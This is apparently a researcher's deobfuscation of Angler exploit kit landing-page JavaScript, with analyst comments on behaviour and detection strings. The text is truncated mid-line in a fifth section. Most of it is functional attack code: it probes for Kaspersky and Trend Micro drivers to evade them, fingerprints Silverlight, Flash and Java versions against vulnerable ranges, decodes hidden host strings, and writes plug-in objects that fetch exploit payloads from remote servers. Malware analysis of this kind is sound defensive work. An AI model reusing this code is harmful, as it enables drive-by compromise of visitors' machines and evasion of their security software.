- #####
- Angler exploit kit deobfuscated sections
- @tehsyntx
- thembits.blogspot.se
- The sections are taken from the span tags located at the top of the landing page.
- #####
- Section one:
// Analyst note: local file-presence probe.
// Asks the Microsoft.XMLDOM ActiveX control to parse a DOCTYPE whose DTD URL is
// "res://" + txt, then inspects the resulting parse error.
//   txt     - local file path to probe (callers pass driver paths).
//   returns - 1 when the error text contains -2147023083, otherwise 0
//             (also 0 when no parse error is reported).
// Detection: a page that instantiates Microsoft.XMLDOM and feeds it a res:// DTD
// pointing into System32\drivers is a strong sign of this kind of fingerprinting.
- function gs7sfd(txt) {
- var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
- xmlDoc.async = true;
- xmlDoc.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://' + txt + '">');
- if (xmlDoc.parseError.errorCode != 0) {
- var err = "Error Code: " + xmlDoc.parseError.errorCode + "\n";
- err += "Error Reason: " + xmlDoc.parseError.reason;
- err += "Error Line: " + xmlDoc.parseError.line;
// -2147023083 is HRESULT 0x80070715 (ERROR_RESOURCE_TYPE_NOT_FOUND). Presumably it is
// only produced when the file itself could be opened, which makes it the
// "file exists" signal - confirm against the control's behaviour.
// "> 0" is sufficient because err always begins with "Error Code: ".
- if (err.indexOf("-2147023083") > 0) {
- return 1;
- } else {
- return 0;
- }
- }
- return 0;
- }
// Analyst note: security-product check. Eight driver paths are probed with gs7sfd().
// kl1.sys is a Kaspersky driver name and the tm*.sys names match Trend Micro drivers
// (vendor attribution comes from the file names, not from this page).
// When any probe returns 1 the script sets window.zxtbVDMp, empties BzJUQufh and
// forces all four plugin flags (j, s, f1, f2) to false.
// NOTE(review): how zxtbVDMp and BzJUQufh are consumed, and whether later sections are
// skipped when they are set, is not visible in the sections shown here.
- if (gs7sfd("c:\\Windows\\System32\\drivers\\kl1.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmactmon.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmcomm.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmevtmgr.sys") || gs7sfd("c:\\windows\\system32\\drivers\\TMEBC32.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmeext.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmnciesc.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmtdi.sys")) {
- window['zxtbVDMp'] = true;
- BzJUQufh = '';
- window.sf325gtgs7sfdj = window.sf325gtgs7sfds = window.sf325gtgs7sfdf1 = window.sf325gtgs7sfdf2 = false;
- };
- #############################################################
- Section two:
// Compatibility shim: defines Array.prototype.indexOf only when the browser lacks it.
// The decoder in window.bbERD calls rawArray.indexOf(), so the shim keeps that call
// working on engines without a native implementation.
//   obj     - value to look for (strict equality).
//   start   - optional first index to examine; defaults to 0.
//   returns - index of the first match, or -1 when none is found.
- if (!Array.prototype.indexOf) {
- Array.prototype.indexOf = function(obj, start) {
- for (var i = (start || 0), j = this.length; i < j; i++) {
- if (this[i] === obj) {
- return i;
- }
- }
- return -1;
- };
- }
// Analyst note: string decoder used by the later sections as bbERD(SnDCSHn).
// It is built with new Function, so the body exists only as a string literal until
// runtime; static scanners that parse the page as script will not see it as code.
// Algorithm as written:
//   1. The key SnDCSH0 (defined outside these sections) is split into characters.
//   2. keyArray[i] = first position in the key of the i-th character of the sorted key.
//   3. The input is padded with spaces to a multiple of the key length (a full extra
//      block is added when the length is already a multiple).
//   4. Each block is re-ordered so that output[j] = block[keyArray[j]].
//   5. All whitespace is stripped from the concatenated result, which is returned.
// Decoding the host, path and parameter strings offline therefore needs the
// SnDCSH0..SnDCSH7 values from the same landing page.
- window.bbERD = new Function('text', "var cryptKey = SnDCSH0, rawArray = cryptKey.split(''), sortArray = cryptKey.split(''), keyArray=[];sortArray.sort(); var keySize = sortArray.length;for (var i=0; i<keySize; i++) {keyArray.push(rawArray.indexOf(sortArray[i]));}var k = keySize - text.length % keySize;for(var l = 0; l<k;l++) {text += ' ';} var endStr = '', i,j,line,newLine;for (i = 0; i < text.length; i += keySize) {line = text.substr(i,keySize).split('');newLine = '';for (j = 0; j < keySize; j++){newLine += line[keyArray[j]];}endStr = endStr + newLine;}endStr=endStr.replace(/\\s/g,'');return endStr;");
// ActiveXObject is looked up by name through window; xObject and AgControl are not
// referenced again in the sections visible here.
- var xObjectName = 'ActiveXObject';
- var xObject = window[xObjectName];
- var AgControl = 'AgControl.AgControl';
// Analyst note: Silverlight version fingerprint.
// Compares the installed Silverlight version with `value`.
//   value   - dotted version string to compare against.
//   returns - 1 when the installed version is greater, 0 when equal, -1 when lower;
//             a falsy value (false/undefined) when no version could be read.
- function silverVersion(value) {
// Non-IE path: the plug-in description string is passed straight to testVersion().
- var nav = navigator.plugins["Silverlight Plug-In"];
- if (nav) {
- return testVersion(nav.description);
- } else {
- try {
// IE path: no version property is read; instead the version is found by repeatedly
// asking the control isVersionSupported() and raising one component at a time.
- var control = new ActiveXObject('AgControl.AgControl');
- var vers = Array(1, 0, 0, 0);
- loopVersion(control, vers, 0, 1);
- loopVersion(control, vers, 1, 1);
// The third component is searched in decreasing step sizes (10000 down to 1).
- loopVersion(control, vers, 2, 10000);
- loopVersion(control, vers, 2, 1000);
- loopVersion(control, vers, 2, 100);
- loopVersion(control, vers, 2, 10);
- loopVersion(control, vers, 2, 1);
- loopVersion(control, vers, 3, 1);
- return testVersion(vers.join('.'));
- } catch (e) {
// Control could not be created or queried: report "no version" as false.
- return testVersion(false);
- }
- }
// Three-way comparison of currentVersion against the outer `value`.
// NOTE(review): dots are removed and the remaining digits compared as one integer
// (parseInt without a radix), so versions whose components differ in width may not
// order as a real version comparison would.
- function testVersion(currentVersion) {
- if (!currentVersion) return currentVersion;
- if (parseInt(String(currentVersion).replace(/\./g, '')) > parseInt(String(value).replace(/\./g, ''))) return 1;
- if (parseInt(String(currentVersion).replace(/\./g, '')) == parseInt(String(value).replace(/\./g, ''))) return 0;
- if (parseInt(String(currentVersion).replace(/\./g, '')) < parseInt(String(value).replace(/\./g, ''))) return -1;
- }
// Raises vers[idx] by inc while the control still reports the version as supported,
// then steps back once so vers holds the last supported value.
- function loopVersion(control, vers, idx, inc) {
- while (IsSupported(control, vers)) {
- vers[idx] += inc;
- }
- vers[idx] -= inc;
- }
// Joins the four components with dots and asks the control whether it supports it.
- function IsSupported(control, ver) {
- return control.isVersionSupported(ver[0] + "." + ver[1] + "." + ver[2] + "." + ver[3]);
- }
- }
// Analyst note: Flash Player version fingerprint.
// Compares the installed Flash version with versionValue.
//   versionValue - dotted version string to compare against.
//   returns      - 1 when the installed version is greater, 0 when equal, -1 when lower;
//                  undefined (or null from version()) when nothing could be read.
- function flashVersion(versionValue) {
- var a = !1,
- res, ver = fixNumber(versionValue);
// Normalises a dotted version: the first component is kept as is and every later
// component is left-padded with zeros to three digits, then all are concatenated.
// `result` is assigned without var, so it becomes an implicit global.
- function fixNumber(num) {
- function beautify(match, number) {
- var res = "000" + match;
- return (res).substr(res.length - 3)
- }
- var n = num.split(".");
- result = n[0] + n[1].replace(/\d+/g, beautify) + n[2].replace(/\d+/g, beautify);
- return n.length > 3 ? result + n[3].replace(/\d+/g, beautify) : result;
- }
// Three-way comparison of a detected version string b against the target `ver`.
// Leading non-digits are dropped and separators are turned into dots before
// normalising; only as many target digits as b has are compared.
- function version(b) {
- if (!b) {
- return null
- };
- b = fixNumber(String(b).replace(/^[^0-9]+/g, '').replace(/[^0-9\.]/g, '.').replace(/\.+/g, '.').replace(/\,/g, '.'));
- if (!b) {
- return null
- };
- var verTest = parseInt(ver.substr(0, b.length));
- if (parseInt(b) > verTest) {
- return 1;
- }
- if (parseInt(b) == verTest) {
- return 0;
- }
- return -1;
- }
// Fallback probe: inserts a 1x1 Flash <object> positioned off-screen and asks the
// running plug-in for "$version". The element is left in the document afterwards.
- function createFlash() {
- var obj = document.createElement("object"),
- newDiv = document.createElement("div"),
- id = String("flash" + new Date()).replace(/\s|\+|\:/g, '');
- newDiv.style.cssText = 'position:absolute;top:-1000px;left:-1000px;';
- obj.setAttribute("type", "application/x-shockwave-flash");
- obj.style.cssText = "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;display:inline;width:1px;height:1px";
- obj.setAttribute("width", "1");
- obj.setAttribute("id", id);
- obj.setAttribute("height", "1");
- obj.id = id;
- newDiv.appendChild(obj);
- document.body.appendChild(newDiv);
- result = String(obj.GetVariable("$version"));
- return result;
- }
// Path 1: navigator.plugins. The plug-in description decides unless the comparison is
// "equal" (0) or unavailable, in which case the live-object probe is used.
- if (navigator.plugins && navigator.plugins.length) {
- var e = navigator.plugins["Shockwave Flash"];
- e && (a = !0, e.description && (b = e.description));
- navigator.plugins["Shockwave Flash 2.0"] && (a = !0, b = "2.0.0.11");
- res = version(b);
- if (res > 0 || res < 0) return res;
- try {
- return version(createFlash());
- } catch (e) {
- return;
- }
- } else {
// Path 2: navigator.mimeTypes, with the same fallback to the live-object probe.
- if (navigator.mimeTypes && navigator.mimeTypes.length) {
- var f = navigator.mimeTypes["application/x-shockwave-flash"];
- (a = f && f.enabledPlugin) && (b = f.enabledPlugin.description);
- res = version(b);
- if (res > 0 || res < 0) return res;
- try {
- return version(createFlash());
- } catch (e) {
- return;
- }
- } else {
// Path 3: ActiveX (IE). Tries the ".7" ProgID, then ".6", then the unversioned one.
- try {
- var g = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"),
- a = !0,
- b = g.GetVariable("$version");
- return version(b);
- } catch (h) {
- try {
// The ".6" branch records a fixed version but returns undefined, so no comparison
// result is produced for it.
- g = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6"), a = !0, b = "6.0.21";
- return;
- } catch (i) {
- try {
- g = new ActiveXObject("ShockwaveFlash.ShockwaveFlash"), a = !0, b = g.GetVariable("$version");
- return version(b);
- } catch (j) {}
- }
- }
- }
- }
- return;
- }
// Analyst note: target selection. Sets the window flags that later sections test.
// Silverlight is selected when the installed version is >= 4.0.50401.0 and
// <= 5.1.10411.0 and is not exactly 5.0.60818.0. When Silverlight is absent
// silverVersion() yields false, and `false != 0` is false, so the else branch runs.
// For defenders: installs newer than the upper bounds checked here fall outside what
// this particular sample selects; other builds may use different ranges.
- var minValue = silverVersion("4.0.50401.0"),
- maxValue = silverVersion("5.1.10411.0"),
- currentValue = silverVersion("5.0.60818.0");
- if (typeof(minValue) != 'undefined' && typeof(maxValue) != 'undefined' && typeof(currentValue) != 'undefined' && minValue >= 0 && maxValue <= 0 && currentValue != 0) {
- window.sf325gtgs7sfds = true;
- } else {
// Flash is considered only for IE (MSIE / Trident) or Firefox user agents.
- var ua = window.navigator.userAgent,
- FF = ua.toLowerCase().indexOf('firefox') > 0,
- IE = ua.indexOf('MSIE ') > 0 || ua.indexOf('Trident/') > 0;
// Selected Flash ranges: 11.3.300.257 to 11.7.700.275, or 11.8.800.94 to 13.0.0.182.
- if ((IE || FF) && ((flashVersion("11.3.300.257") >= 0 && flashVersion("11.7.700.275") <= 0) || (flashVersion("11.8.800.94") >= 0 && flashVersion("13.0.0.182") <= 0))) {
// Excluded: Firefox on a "Windows NT 6" appVersion with Flash >= 11.3.000.000.
- if (!(FF && flashVersion("11.3.000.000") >= 0 && navigator.appVersion.indexOf('Windows NT 6') >= 0)) {
// Excluded: user agents without "Win64"/"x64" whose Flash version equals either
// upper bound (11.7.700.275 or 13.0.0.182).
- if (!((navigator.userAgent.indexOf("Win64") == -1 && navigator.userAgent.indexOf("x64") == -1) && (flashVersion("11.7.700.275") == 0 || flashVersion("13.0.0.182") == 0))) {
- window.sf325gtgs7sfdf1 = true;
- }
- }
- }
// The Java flag is set independently of the Silverlight/Flash outcome.
- } if (navigator.javaEnabled()) {
- window.sf325gtgs7sfdj = true;
- }
// Browser.Version(): returns the number following "MSIE" in navigator.appVersion,
// or 999 when appVersion contains no "MSIE" token.
- var Browser = {
- Version: function() {
- try {
// The regex is tested against no argument and its result is never read, so this
// statement has no effect on the returned version. The pattern names a malware
// research blog and can serve as a literal string for signature matching.
- var birks = /malware.dontneedcoffee.com/.test();
- } catch (e) {}
- var version = 999;
- if (navigator.appVersion.indexOf("MSIE") != -1) version = parseFloat(navigator.appVersion.split("MSIE")[1]);
- return version;
- }
- };
// Analyst note: no-target exit. When none of the four plugin flags is set and
// Browser.Version() is above 10 (which includes the 999 default for non-MSIE
// appVersion strings), the page navigates to a same-host path decoded from SnDCSH1.
// NOTE(review): decIt is not defined in the sections shown; the decoder defined
// earlier is named bbERD, so this may rely on code outside these sections.
- if (!window.sf325gtgs7sfdj && !window.sf325gtgs7sfds && !window.sf325gtgs7sfdf1 && !window.sf325gtgs7sfdf2 && (Browser.Version() > 10)) {
- var urlName = decIt(SnDCSH1);
- document.location.href = "/" + urlName;
- }
- #############################################################
- Section three:
// Analyst note: Silverlight delivery. Runs only when the Silverlight flag is set and
// the Flash flag is not.
- if (window.sf325gtgs7sfds && !window.sf325gtgs7sfdf1) {
// "write" is assembled from two fragments, so the literal document.write never
// appears in the script text.
- var klfg1 = 'wri',
- klfg2 = 'te';
// Each helper decodes one page-supplied string with bbERD: host (SnDCSH2),
// path (SnDCSH3) and the initParams payload (SnDCSH4).
- function getKolaio() {
- return bbERD(SnDCSH2);
- }
- function getTxl() {
- return bbERD(SnDCSH3);
- }
- function getData() {
- return bbERD(SnDCSH4);
- }
// Writes a Silverlight <object> whose source is http://<host>/<path> and which
// receives the decoded data as initParams "exteeec=...". The form id, the
// silverlightControlHost div and the "exteeec=" parameter name are fixed strings in
// this sample and usable for content matching; they may differ in other builds.
- document[klfg1 + klfg2]('<form id="form1" runat="server" style="height: 100%"><div id="silverlightControlHost"><object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%"><param name="source" value="http://' + getKolaio() + '/' + getTxl() + '" /><param name="initParams" value="exteeec=' + getData() + '"/></object></div></form>');
- }
- #############################################################
- Section four:
// Analyst note: Flash delivery. Runs only when the Flash flag is set and the
// Silverlight flag is not.
- if (window.sf325gtgs7sfdf1 && !window.sf325gtgs7sfds) {
// "write" is assembled from two fragments, so the literal document.write never
// appears in the script text.
- var klfg1 = 'wri',
- klfg2 = 'te';
// Decoders for host (SnDCSH5), path (SnDCSH6) and FlashVars payload (SnDCSH7).
// getTxl and getData accept an argument but never use it.
- function getKolaio() {
- return bbERD(SnDCSH5);
- }
- function getTxl(a) {
- return bbERD(SnDCSH6);
- }
- function getData(a) {
- return bbERD(SnDCSH7);
- }
- var mirtul = "1";
// Builds a 1x1 Flash <object> (classid form for IE, with a nested type= form inside
// conditional comments for other browsers). Both load http://<host>/<path> with
// allowScriptAccess=always and pass the decoded data as FlashVars "exec=...".
// The id "23kjsdf" and the "exec=" parameter name are fixed strings in this sample
// and usable for content matching; they may differ in other builds.
- var txt = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="1" height="1" id="23kjsdf"><param name="movie" value="http://' + getKolaio() + '/' + getTxl(mirtul) + '" /><param name=FlashVars value="exec=' + getData(mirtul) + '" />';
- txt = txt + '<!--[if !IE]>--><object type="application/x-shockwave-flash" data="http://';
- txt = txt + getKolaio() + '/' + getTxl(mirtul) + '" allowScriptAccess=always width="1" height="1"><param name="movie" value="http://' + getKolaio() + '/' + getTxl(mirtul) + '" />';
- txt = txt + '<param name=FlashVars value="exec=' + getData(mirtul) + '" /><!--<![endif]--><!--[if !IE]>--></object><!--<![endif]--></object>';
- document[klfg1 + klfg2](txt);
- }
- #############################################################
- Section five:
- var ldklfgo;
- var klfg1 = 'wri',
- klfg2 = 'te';
- ldklfgo = {
- isDefined: function(b) {
- return typeof b != "undefined"
- },
- isArray: function(b) {
- return (/array/i).test(Object.prototype.toString.call(b))
- },
- isFunc: function(b) {
- return typeof b == "function"
- },
- isString: function(b) {
- return typeof b == "string"
- },
- isNum: function(b) {
- return typeof b == "number"
- },
- isStrNum: function(b) {
- return (typeof b == "string" && (/\d/).test(b))
- },
- getNumRegx: /[\d][\d\.\_,\-]*/,
- splitNumRegx: /[\.\_,\-]/g,
- getNum: function(b, c) {
- var d = this,
- a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null;
- return a ? a[0] : null
- },
- compareNums: function(h, f, d) {
- var e = this,
- c, b, a, g = parseInt;
- if (e.isStrNum(h) && e.isStrNum(f)) {
- if (e.isDefined(d) && d.compareNums) {
- return d.compareNums(h, f)
- }
- c = h.split(e.splitNumRegx);
- b = f.split(e.splitNumRegx);
- for (a = 0; a < Math.min(c.length, b.length); a++) {
- if (g(c[a], 10) > g(b[a], 10)) {
- return 1
- }
- if (g(c[a], 10) < g(b[a], 10)) {
- return -1
- }
- }
- }
- return 0
- },
- formatNum: function(b, c) {
- var d = this,
- a, e;
- if (!d.isStrNum(b)) {
- return null
- }
- if (!d.isNum(c)) {
- c = 4
- }
- c--;
- e = b.repl